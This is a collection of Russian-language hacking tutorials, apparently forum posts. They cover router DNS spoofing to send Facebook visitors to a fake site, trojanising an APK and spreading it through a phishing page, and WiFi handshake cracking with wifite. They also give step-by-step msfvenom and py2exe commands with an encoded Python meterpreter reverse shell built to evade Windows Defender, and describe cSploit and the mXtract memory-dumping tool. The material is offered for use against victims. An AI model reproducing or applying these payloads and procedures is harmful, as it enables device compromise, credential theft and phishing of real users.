Всем привет, сейчас я вам расскажу о DNSChef. Это прокси днс, с помощью которого мы сможем подменить настоящий днс на фейковый. Итак, DNS-сервер это тоже своего рода компьютер, на котором сохранены все IP-адреса. Например когда мы хотим зайти на какой-то сайт и вводим ссылку в строку, то мы обращаемся к DNS-серверу и говорим: “Железка, мы хотим IP-адрес, на котором находится этот сайтик”, он дает на IP-адрес, далее мы по нему перенаправляемся и уже переходим на сайт. Объяснил я довольно грубо, но зато понятно обычному человек. Если мы подменим DNS-сервер в роутере, то он останется рабочим, но прикол в том, что мы сможем направлять пользователя на любой другой сайт. Например если мы подменим DNS-сервер, то при попытке допустим зайти на сайт – facebook.com, жертва получит не реальный адрес, а фейковый, который перенаправит его на наш сайт. Что нам понадобится: 1. VPS-сервер, на которым мы сможем подменить DNS-сервер и поставить фейковый сайт. 2. Роутер, который имеет возможность смены DNS-сервера, если не ошибаюсь, то во всех современных роутерах такая функция имеется. 3. DNSChef Установка и настройка DNSChef Первым делом нам надо установить DNSChef, поэтому начнем с него. Я буду устанавливать его на VPS-Ubuntu. Вы же можете выбрать самостоятельно VPS и поставить его на необходимую вам операционную систему. Хостера вы также можете выбирать самостоятельно, но рекомендуется, чтобы он находился за пределами России. Если говорить о российских, то могу выделить ihor.ru, если же выбирать из зарубежных, то рекомендую zomro.com Также советую вам установить панель VestaCP, чтобы было удобнее настраивать, добавлять домены и базы данных. Надеюсь с этим вы справитесь. Далее нам нужно установить эту утилиту. Из этого можно понять, что DNSChef Нормально запустился. Дальше нам нужно стартануть и указать, какой домен будет является ненастоящим и где будет находится его IP-адрес. Подмена DNS в роутере и создание домена Когда вы все закончили, нам нужно будет поменять IP-адресс в роутере. Как это делается, вы можете узнать в интернете. Отлично, мы все сделали, теперь добавляем наш ненастоящий домен в VestaCP. Домен готов, так как мы используем VestaCP, он самостоятельно проведет настройку и поставит его на виртуальный хостинг. Как пример создаем файл в папке с facebook.com. Отлично, когда кто-то будет подключен к интернете через данный роутер, на котором совершена подмена, то при входа на различные сайты все будет в порядке, но если пользователь попытается зайти в facebook.com его перебросит на наш сайт.
-
- подмена
- подмена dns
- (and 10 more)
-
Всем привет, сейчас расскажу вам о том, как с помощью apk-файла мы сможем получить доступ к устройству. Первым делом вам нужно скачать любой APK-файл, главное чтобы он весел менее 5 мегабайт, поэтому идем на такой сайт как 4PDA и находим какую-нибудь программу, лично я возьму программу, которая позволят скачивать музыку из соц. сетей. После выполнения данного пункта нам нужно перейти в терминал и прописать все это: -x – использование определенного файла -p – прикрепить payload -o – как-то назвать файл -e – зашифрока файла от антивируса -I – указания кол-ва слоев шифрования Нажимаем Ентер и ожидаем, либо у нас появится ошибка, либо файл будет скомпилирован. Если все-таки появилась ошибка, то нам необходимо обновить APKtool. Если и это не смогло вам помочь, то ищем другой apk-файл, который будете использовать для заражения. Теперь нам нужно использовать фишинг и навыки социальной инженерии для того, чтобы создать простую страницу для зараженной программы. Для создания страницы можно использовать различные конфигураторы сайтов, либо делать это по какому-то исходнику, его я прикрепляю. Не забывайте, что если будете использовать какой-либо конфигуратор, он добавит вам кучу не нужного мусора и хлама. Исходник - https://bit.ly/2k3hKP2 Пароль – social_engineering Помещаем зараженный APK-файл в папку Social, по адресу /var/www/html/ Если картинка не отображается, то вам нужно дать доступ юзеру для чтения и записи в www. Теперь нам необходимо открыть index.html с помощью любого редактора текста и поменять все необходимые вам надписи. После запуска нам нужно открыть бразуер и ввести там свой IP-адрес. Что ваш айпишник стал выглядеть как ссылка для сайта, вам нужно будет установить кое-какую программу, ее найти можно на GitHub, называется она – Cuteit Все расписывать я не буду, в программе есть руководство, которого будет достаточно для нашей задачи. Берем понравившуюся ссылку, копирую ее и вставляем в браузер. Вуаля, мы попали на собственный сервер. Однако в строке сразу же палится ваш IP-адрес, его мы уберем с помощью Ngrok. Скачиваем его, после чего проходим регистрацию и выполняем все действия из руководства, главное быть точным, иначе ничего не сработает. Когда вы закончить все это дело, нам нужно перейти в папку с этой программой, открыть терминал и вписать: Вот мы и получили ссылки, на этом все.
-
Всем привет, сейчас расскажу об отличном инструменте, который поможет вам во взломе WiFi – wifite. Это крайне маленький гайд, все предельно просто и ясно даже новичку. Данную утилиту можно найти по стандарту в кали линукс, поэтому спокойно этот способ подойдет даже для телефонов. Вся информация лишь для ознакомления и возможного создания безопасной оболочки от взломов. Способ взлома весьма стандартный, перехват хеша и деаутентификация. Главный плюс инструмента, то что всю работу он берет на себя и автоматизирует процесс ввода команд. Начнем 1. Запускаем кали 2. Открываем консоль и устанавливаем пользовательскую версию программы, так как стандартная уже не обновляется. 3. Когда будет установлена, пишем – cd wifite2 и заходим в корень к инструменту 4. Чтобы запустить: ./Wifite.py Наша карта теперь автоматом перевелась в режим мониторинга, моментально сканируются ближайшие сети, ожидаем обнаружения нужной. 5. Выбираем сеть, которую собираемся подвергнуть атаке. 6. Клацаем ctrl+c прописываем номер сети или несколько номеров. 7. Начинается деаутентификация и перехват хэндшейков, ожидаем некоторое время. После перехвата мы увидим уведомление, если выбрано несколько сетей, процесс повторяется для каждой сети. 8. Полученный хеш мы можем расшифровывать любым доступным способом.
-
Всем привет. Сегодня рассмотрим вариант запуска meterpreter сессии на машине Windows 10 с самыми свежими патчами (включая Windows Defender). И все также будем обходить антивирусы. Meterpreter — расширенная многофункциональная начинка (payload, нагрузка), которая может быть динамически расширена во время выполнения. В нормальных условиях это обеспечивает вас основной оболочкой и позволяет вам добавлять новые особенности к ней по мере необходимости. Будем мы это делать с помощью Python, и посмотрим, как поведут себя антивирусные средства. Предугадывая вопрос «А нужен ли нам Python на машине жертвы для запуска ехе?», отвечу сразу – нет, не нужен, все уже внутри. В данной статье мы будем использовать: Windows 10 с включенным Windows Defender с обновленными базами (компьютер жертвы 192.168.1.113);Kali linux для использования metasploit и msfvenom (192.168.1.126); Windows 10 для сборки бинарника (в нашей лаборатории совпадает с компьютером жертвы) с установленными; Python (3, но и для 2 тоже посмотрим);py2exe.Для начала обозначим проблему: создадим exe файл со стандартной нагрузкой, скопируем на машину жертвы и посмотрим к чему это приведёт. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f exe > hunt.exe Мы получаем предупреждение от нашего старого друга Windows Defender, которого мы так все любим. Давайте запустим Python и сделаем то, ради чего мы все тут собрались. Python/meterpreter/reverse_tcp – это уникальный кроссплатформенный payload Metasploit Framework, который позволяет удаленно управлять скомпрометированным компьютером. Не нужно думать о том, какую платформу выбрать, он сработает на любой, но в данном случае сделаем из него исполняемый файл под Windows. Для начала установим пакет py2exe, который позволяет сделать исполняемый файл Windows из Python скрипта. У нас это будет Python 3.4 (все что выше – не поддерживает py2exe). py -3.4 –m pip install py2exe или pip install py2exe Далее создадим «сырой» питоновский код с расширением .py msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f raw > hunt.py Так же в вывод msfvenom нам необходимо добавить импорт getpass, который он забывает сделать сам. В итоге получиться должно так: import getpass,base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4xMjYnLDkwMDEpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK'))) Теперь у нас все готово для создания бинарника. python34 -m py2exe.build_exe hunt.py --bundle-files 0 Уже лучше, теперь проверим это в действии – после копирования на машину жертвы обходимся без алертов. Параллельно запустим наш msf и handler для питона, запустив последовательно команды: msfconsole use exploit/multi/handler set PAYLOAD python/meterpreter/reverse_tcp set lhost 192.168.1.126 set lport 9001 run Пойдем дальше и убедимся, что сессия работает корректно. Таким образом сессия запущена и Windows Defender не сработал, чего мы и добивались. Заодно давайте рассмотрим, что делать, если у вас Python 2ой версии. Качаем py2exe для python 2 Генерируем payload с расширением .py Создаем файл setup.py и пишем туда следующее: from distutils.core import setup import py2exe setup( name = ‘Meter’, description = ‘Python-based App’, version = ‘1.0’, console=[‘hunt.py’], options = {‘py2exe’: {‘bundle_files’: 1,’packages’:’ctypes’,’includes’: ‘base64,sys,socket,struct,time,code,platform,getpass,shutil’,}}, zipfile = None, ) python.exe .\setup.py py2exeДолжно получиться все то же самое. В качестве итога замечу, что оболочка python meterpreter уступает по функционалу более привычному windows meterpreter. Например, не получится мигрировать в процесс или использовать команды типа getsystem, но все же это реальная альтернатива: получить сессию для работы с msf (routing и portfwd как минимум) и далее работать внутри сети.
-
- windows
- windows defender
- (and 12 more)
-
cSploit является одним из самых многофункциональных инструментов, благодаря которым можно проводить анализ сети на наличие различных уязвимостей и эксплойтов. Данный инструмент создает карту сети, где можно получить информацию о всех подключенных устройствах. Данная программа может узнать IP а также MAC адреса устройства, также может узнавать установленную на устройство операционную систему и вести поиск уязвимостей с помощью Metasploit и кроме всего этого может начинать брут паролей. MITM атаки различных видов проводятся с помощью DNS spoofing, об этом я как раз совсем недавно рассказывал. Также эта программа позволит вам отключать определенные устройства. Также есть функция перехвата трафика, а также его сохранения и перенаправлению в любую заданную точку. Утилита включает в себя другие инструменты, например инструмент, который позволит отправить на любой хост TCP или же UDP пакет. К сожалению, база данной программы не обновляется уже 4 года, однако этого не отменяет ее эффективности. На примере роутера, который поступил в продажу в начала 2017 года и имеется в себе новейшую прошивку этого года, можно увидеть, что в нем имеется уязвимость, которая была обнаружена еще в далеком 2009 году. Думаю, больше рассказывать про данную программу не имеет никакого смысла, ведь эта утилита по моему мнению является обязательной для любого пентестера. А также для тех, кто заинтересован во взломе смартфонов
-
Привет, всем, из названия статьи вы уже узнали о чем пойдет речь, но все я же скажу немного поподробнее. mXtract – это программа с открытым исходным кодом для Linux, с помощью нее можно проводить анализ и создавать дампы памяти. Данная программа была создана для пентестов, чтобы находить в памяти закрытые ключи и пароли, используя при этом словарь регулярных выражений. Чаще всего в дистрибутивах Линукс можно получать права на получения содержимого памяти процесса, а это значит, что хакеры могут заполучить данные, которые будут прочитаны ими как открытая книга. Итак, небольшой список того, что умеет данный инструмент: Ввод регулярных выраженийУдобный вывод информацииМожно проводить массовые сканированияУстановление определенной точки сканированияДамп памяти, который можно обработаться сразу же с помощью иных утилит. Установка Компиляция: g++ -std=c++11 -O2 src/main.cpp -o mxtract Список команд: -v Enable Verbose Output -s Suppress Banner -h Help -c suppress colored output -r= Regex DB -a Scan all memory ranges not just heap/stack -w Write raw memory to file Default directory is pid/ -o Write regex output to file -d= Custom Ouput Directory -p= Specify single pid to scan Either -r= or -w needed
-
- mxtract
- инструмент
- (and 10 more)